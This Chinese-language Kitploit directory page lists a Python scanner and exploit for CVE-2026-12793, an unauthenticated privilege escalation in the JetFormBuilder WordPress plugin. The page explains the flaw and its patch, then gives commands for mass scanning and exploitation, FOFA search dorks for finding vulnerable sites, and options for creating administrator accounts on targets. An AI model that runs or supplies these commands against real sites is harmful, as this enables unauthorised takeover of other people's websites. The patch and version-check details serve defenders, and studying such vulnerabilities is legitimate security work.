Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-12793 — Python PoC 扫描器和针对 CVE-2026-12793 的漏洞利用程序,该漏洞是 JetFormBuilder <=3.6.2 中的一个未认证权限提升漏洞,可创建 WordPress 管理员账户。 | Kitploit
工具/GitHubGitHub/murrez/cve-2026-12793
权限提升侦察漏洞扫描器漏洞分析漏洞利用脚本与自动化Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubmurrez/cve-2026-12793

CVE-2026-12793

11小时13分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Python PoC 扫描器和针对 CVE-2026-12793 的漏洞利用程序,该漏洞是 JetFormBuilder <=3.6.2 中的一个未认证权限提升漏洞,可创建 WordPress 管理员账户。

查看仓库

CVE-2026-12793 — JetFormBuilder 未认证权限提升

针对 WordPress 插件 JetFormBuilder — Dynamic Blocks Form Builder(Crocoblock)中 CVE-2026-12793 的概念验证扫描器与漏洞利用工具。

CVECVE-2026-12793
插件jetformbuilder
受影响版本≤ 3.6.2
修复版本3.6.2.1+
CVSS9.8 严重
认证未认证
CWECWE-269 — 权限管理不当
研究员daroo (Wordfence)

漏洞

该插件在将 _jet_engine_booking_form_id 所引用文章的区块内容作为表单 schema 加载并执行提交后操作之前,未验证该 ID 是否指向已发布的 jet-form-builder 自定义文章类型。

未认证攻击者可提交精心构造的 AJAX 请求,触发 Register User 操作(wp_insert_user)并创建新的 WordPress 账户。若目标表单被错误配置为高权限角色(例如 administrator),则可导致整站接管。

攻击流程

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

补丁(3.6.2.1)

  • Block_Helper::is_valid_form_post() — 仅接受已发布的 jet-form-builder CPT
  • Form_Handler::set_form_id() 拒绝无效的表单 ID
  • SSR 验证加固(wp_insert_user / wp_update_user 作为回调被阻止)

环境要求

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

使用方法

单一目标 — 检查

root@kitploit:~
python poc.py -u https://target.example --mode check

批量扫描

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

输入格式:每行一个域名/URL、FOFA CSV(host,domain),或上次运行生成的 candidates.jsonl。

漏洞利用(单一目标)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

从候选列表批量利用

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

选项

输出文件

文件内容
hits.txt存在漏洞 / 已被利用的目标 URL

候选条目示例

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

自动检测的字段名仅为启发式结果。利用前请务必验证并使用 --fields 覆盖。

检测 / FOFA dorks

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

版本检查:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

查找 Stable tag: ≤ 3.6.2。

参考资料

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

免责声明

本工具仅供授权的安全测试与教育目的使用。未经授权访问计算机系统属于违法行为。作者对任何滥用行为不承担任何责任。

许可证

MIT

下载工具
参数描述
-u, --url单一目标 URL
--list目标列表文件
--modecheck(默认)或 exploit
--form-id已知的 JetFormBuilder 表单文章 ID
--page-url嵌入表单的页面(referer),例如 /register/
--fields字段映射:login=x,email=y,password=z
--paths用于爬取表单的额外路径
--username / --email / --password漏洞利用所用凭据(省略则随机生成)
--verify提交后通过 wp-login.php 验证账户
-j, --threads工作线程数(默认:20)
--timeoutHTTP 超时秒数(默认:20)
--proxyHTTP(S) 代理 URL
--output完整 JSONL 日志(默认:cve_2026_12793_results.jsonl)
--vuln-list命中列表(默认:hits.txt)
--candidates-list候选 JSONL(默认:candidates.jsonl)
-q, --quiet仅输出进度
candidates.jsonl
可访问 Register User 探测的目标(form_id、page_url、fields)
cve_2026_12793_results.jsonl每个目标的完整 JSON 结果